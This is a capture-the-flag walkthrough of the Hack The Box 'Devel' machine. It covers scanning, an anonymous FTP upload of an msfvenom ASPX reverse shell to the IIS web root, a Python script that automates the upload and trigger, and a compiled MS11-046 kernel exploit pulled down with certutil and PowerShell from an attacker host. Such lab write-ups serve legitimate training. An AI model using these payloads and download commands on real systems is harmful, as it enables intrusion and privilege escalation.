Devel

Devel HTB 2023 Walkthrough. Devel is a relatively simple Windows machine that demonstrates the security risk of some default program configurations: here an anonymous FTP server whose root directory is also the IIS web root, which turns a file upload into code execution.

Scanning

The initial scan shows two open ports: 21 (FTP) and 80 (HTTP).

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sC -sV -O -T4 10.10.10.5  
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-07 00:53 EDT
Nmap scan report for 10.10.10.5
Host is up (0.19s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 08-07-23  05:09AM                 1398 cmd.aspx
| 03-17-17  05:37PM                  689 iisstart.htm
| 08-07-23  07:46AM                73802 metshell.exe
| 08-07-23  05:09AM                28160 nc.exe
| 08-07-23  07:45AM                15970 shell.aspx
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.71 seconds
  • Port 80: Microsoft IIS 7.5, the version that ships with Windows 7 / Server 2008 R2. TRACE is enabled, which is noise here but worth noting.

  • Port 21: Microsoft ftpd with anonymous login allowed. The listing already contains the default IIS files (aspnet_client, iisstart.htm, welcome.png, all dated March 2017), a strong hint that the FTP root is the web root. The other files (cmd.aspx, metshell.exe, nc.exe, shell.aspx) are dated the day of the scan and were left behind by other players; they are not part of the box.

Web Enumeration

Visiting the site shows the default IIS7 welcome page (iisstart.htm with welcome.png), the same files seen in the FTP listing.

Directory brute-forcing finds nothing either.

┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -u http://10.10.10.5/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50    
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.5/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/08/07 01:03:31 Starting gobuster in directory enumeration mode
===============================================================
Progress: 87631 / 87665 (99.96%)
===============================================================
2023/08/07 01:10:03 Finished
===============================================================

FTP Enumeration

Anonymous FTP login works, and the directory holds the default IIS files (aspnet_client, iisstart.htm, welcome.png), so the FTP root is the web root. Anything we upload is served by IIS, and because IIS executes .aspx pages, an arbitrary file upload becomes remote code execution (this is a file upload to the web root, not local file inclusion).

Exploitation

So we can upload an ASPX reverse shell and get code execution in the context of the IIS worker process.

Generate a shell

Create a non-staged reverse shell with msfvenom. windows/shell_reverse_tcp carries the whole shell in one payload, so it connects straight back to a plain netcat listener; a staged payload such as windows/shell/reverse_tcp would need a Metasploit handler to deliver the second stage.

┌──(kali㉿kali)-[~/Desktop]
└─$ msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.29 LPORT=4444 -o reverse-shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2704 bytes
Saved as: reverse-shell.aspx

Initial Access

Upload the shell over FTP (anonymous login, binary mode):

ftp> put reverse-shell.aspx 
local: reverse-shell.aspx remote: reverse-shell.aspx
229 Entering Extended Passive Mode (|||49173|)
125 Data connection already open; Transfer starting.
100% |**************************************************************************************************************************|  2742       13.07 MiB/s    --:-- ETA
226 Transfer complete.
2742 bytes sent in 00:00 (12.47 KiB/s)
ftp> 

Now start a netcat listener on the port given to msfvenom:

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lnvp 4444
listening on [any] 4444 ...

Request http://10.10.10.5/reverse-shell.aspx in the browser (or with curl) and the listener receives a shell. The HTTP request will appear to hang: the payload runs inside the IIS worker process that is handling the request, so the response never completes while the shell is alive.

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.5] 49174
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>
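
The steps above (check that FTP writes land in the web root, upload the shell, trigger it) as a single script. This is an added example, not code from the original walkthrough: before dropping an .aspx it uploads an inert text probe and fetches it over HTTP, so you learn whether the FTP root really is served by IIS without executing anything on the target. The target address and payload file name are the ones used on this page; the probe name, timeouts and the use of Python's ftplib/urllib are assumptions of the example.

```python
#!/usr/bin/env python3
"""Added example, not code from the original walkthrough.

Confirms that the anonymous-writable FTP root is the IIS web root by
uploading an inert text probe and fetching it over HTTP, then uploads the
msfvenom .aspx shell and requests it so the waiting listener gets a callback.
"""
import functools
import ftplib
import io
import secrets
import socket
import sys
import urllib.error
import urllib.request
from typing import Callable, Optional, Tuple

TARGET = "10.10.10.5"           # Devel, as on the page
PAYLOAD = "reverse-shell.aspx"  # msfvenom output, as on the page


def ftp_upload(host: str, name: str, data: bytes) -> None:
    """Anonymous login and STOR one file in the FTP root (binary mode)."""
    with ftplib.FTP(host, timeout=10) as ftp:
        ftp.login()  # user 'anonymous', password 'anonymous@'
        ftp.storbinary(f"STOR {name}", io.BytesIO(data))


def ftp_delete(host: str, name: str) -> None:
    """Anonymous login and DELE one file in the FTP root."""
    with ftplib.FTP(host, timeout=10) as ftp:
        ftp.login()
        ftp.delete(name)


def http_get(host: str, path: str, timeout: float = 10) -> Tuple[int, bytes]:
    """GET http://host/path; 4xx/5xx come back as (status, body), not as exceptions."""
    try:
        with urllib.request.urlopen(f"http://{host}/{path}", timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as exc:
        return exc.code, exc.read()


def confirm_webroot(upload: Callable[[str, bytes], None],
                    fetch: Callable[[str], Tuple[int, bytes]],
                    delete: Callable[[str], None],
                    token: Optional[str] = None) -> bool:
    """True if a file STORed over FTP is served back by the web server.

    The three operations are injected so the decision logic can be tested
    without a network. The probe is a .txt file, so IIS serves it as static
    content and nothing executes; it is removed again whatever the outcome.
    """
    token = token or secrets.token_hex(8)
    name = f"probe-{token}.txt"          # assumed probe name
    upload(name, token.encode())
    try:
        status, body = fetch(name)
        return status == 200 and token.encode() in body
    finally:
        try:
            delete(name)
        except Exception:
            pass  # best effort: the probe is inert even if it stays behind


def main(host: str = TARGET, payload: str = PAYLOAD) -> int:
    upload = functools.partial(ftp_upload, host)
    fetch = functools.partial(http_get, host)
    delete = functools.partial(ftp_delete, host)

    if not confirm_webroot(upload, fetch, delete):
        print("FTP root is not served over HTTP; an .aspx upload would not execute")
        return 1
    with open(payload, "rb") as fh:
        upload(payload, fh.read())
    # The listener (nc -lnvp 4444) must already be running. The payload runs inside
    # the IIS worker process handling this request, so the response never completes
    # while the shell is alive: a timeout here is the expected sign of success.
    try:
        http_get(host, payload, timeout=5)
    except (urllib.error.URLError, socket.timeout, TimeoutError):
        pass
    return 0


if __name__ == "__main__":
    sys.exit(main(*sys.argv[1:]))
```

Run it with the netcat listener already up; a clean "not served over HTTP" exit means the FTP directory is not the web root and a different route is needed.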

Privilege Escalation

The shell drops us in c:\windows\system32\inetsrv, the IIS directory, so we are running as the IIS application-pool identity rather than a logged-on user (whoami confirms this). Let's first get the system info.

c:\windows\system32\inetsrv>systeminfo
systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 (Greek-locale AM/PM marker garbled in extraction)
System Boot Time:          7/8/2023, 2:57:40 πμ
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     3.071 MB
Available Physical Memory: 2.423 MB
Virtual Memory: Max Size:  6.141 MB
Virtual Memory: Available: 5.496 MB
Virtual Memory: In Use:    645 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 3
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5
                                 [02]: fe80::58c0:f1cf:abc6:bb9e
                                 [03]: dead:beef::915a:54b9:46fa:b83d
                                 [04]: dead:beef::58c0:f1cf:abc6:bb9e
  • Windows 7 Enterprise build 7600: the RTM release with no service pack, missing years of kernel fixes

  • No hotfixes are installed (Hotfix(s): N/A)

  • The OS is 32-bit: System Type says X86-based PC even though the CPU itself is x64, so any exploit must be compiled as a 32-bit binary
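
The three observations above, done programmatically. This is an added example, not part of the original walkthrough: it parses a raw systeminfo dump into kernel build, OS bitness and installed hotfixes, and flags whether the MS11-046 afd.sys bug that the 40564.c exploit used below targets is plausibly unpatched. The KB number for MS11-046 (KB2503665) is from the Microsoft bulletin, not from this page; the first sample is trimmed from the systeminfo output above and the second is constructed to show what a patched 64-bit host looks like.

```python
#!/usr/bin/env python3
"""Added example, not from the original walkthrough: triage `systeminfo` output."""
import re
from typing import Dict, List

# Trimmed from the systeminfo output of the Devel box shown above.
DEVEL = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
Hotfix(s):                 N/A
Domain:                    HTB
"""

# Constructed sample: a patched 64-bit Windows 7 SP1 host.
PATCHED = """\
Host Name:                 WS01
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB976902
                           [02]: KB2503665
"""

# KB of the MS11-046 (afd.sys) fix, taken from the Microsoft bulletin, not from the page.
MS11_046_KB = "KB2503665"


def parse_systeminfo(text: str) -> Dict[str, object]:
    """Return the top-level 'Key: value' fields plus a 'hotfixes' list of KB ids.

    Indented continuation lines ('[nn]: ...') belong to the preceding key; only
    those under Hotfix(s) are collected, so 'Hotfix(s): N/A' yields an empty list.
    """
    fields: Dict[str, object] = {}
    hotfixes: List[str] = []
    current = None
    for line in text.splitlines():
        m = re.match(r"^(\S[^:]*):\s*(.*)$", line)
        if m:
            current = m.group(1).strip()
            fields[current] = m.group(2).strip()
        elif current == "Hotfix(s)":
            kb = re.search(r"\bKB\d+\b", line)
            if kb:
                hotfixes.append(kb.group(0))
    fields["hotfixes"] = hotfixes
    return fields


def triage(text: str) -> Dict[str, object]:
    """Extract build, OS bitness and hotfixes, and decide if EDB-40564 is worth trying."""
    info = parse_systeminfo(text)
    version = str(info.get("OS Version", ""))
    build_match = re.search(r"Build (\d+)", version)
    build = int(build_match.group(1)) if build_match else 0
    # 'System Type' reflects the installed OS, not the CPU: Devel reports an x64 CPU
    # but an X86-based PC, i.e. a 32-bit Windows.
    arch = "x86" if str(info.get("System Type", "")).lower().startswith("x86") else "x64"
    hotfixes = list(info["hotfixes"])
    # Conditions for the page's exploit: 32-bit OS (the binary is built with
    # i686-w64-mingw32-gcc), NT 6.1 kernel (Windows 7 / 2008 R2), and the fix absent.
    candidate = arch == "x86" and version.startswith("6.1.") and MS11_046_KB not in hotfixes
    return {"host": info.get("Host Name"), "build": build, "arch": arch,
            "hotfixes": hotfixes, "ms11_046_candidate": candidate}


if __name__ == "__main__":
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else DEVEL
    for key, value in triage(text).items():
        print(f"{key}: {value}")
```

Feed it a dump saved on the box (systeminfo > si.txt, then pull the file back) or let it run on the embedded sample. An empty hotfix list is a hint rather than proof: systeminfo prints N/A both when nothing is installed and when the query fails, so confirm before relying on it.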

Searching for this build turns up a kernel exploit: Exploit-DB 40564, the MS11-046 afd.sys local privilege escalation for 32-bit Windows 7.

Download the exploit source (40564.c).

Now cross-compile it as a 32-bit Windows binary with mingw. The -lws2_32 flag links Winsock, which the exploit needs because afd.sys is the Winsock kernel driver.

┌──(kali㉿kali)-[~/Desktop]
└─$ i686-w64-mingw32-gcc 40564.c -o checkmate.exe -lws2_32

Now serve it from a Python HTTP server and pull it onto the box with certutil:

┌──(kali㉿kali)-[~/Desktop]
└─$ python3 -m http.server 80                                                                                     
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.5 - - [07/Aug/2023 01:36:37] "GET /checkmate.exe HTTP/1.1" 200 -
10.10.10.5 - - [07/Aug/2023 01:36:41] "GET /checkmate.exe HTTP/1.1" 200 -
c:\Users\Public\Downloads>certutil -urlcache -f http://10.10.14.29:80/checkmate.exe checkmate.exe
certutil -urlcache -f http://10.10.14.29:80/checkmate.exe checkmate.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\Users\Public\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 137F-3971

 Directory of c:\Users\Public\Downloads

07/08/2023  08:42 πμ    <DIR>          .
07/08/2023  08:42 πμ    <DIR>          ..
07/08/2023  08:42 πμ           240.005 checkmate.exe
               1 File(s)        240.005 bytes
               2 Dir(s)   4.676.771.840 bytes free

PowerShell would have worked for the download as well. This one-liner comes from a different session, so its attacker IP, port and file name differ from the ones above; adjust them to match your server.

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.30:9005/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

Run it and we get a shell as NT AUTHORITY\SYSTEM (the Windows equivalent of root); confirm with whoami.
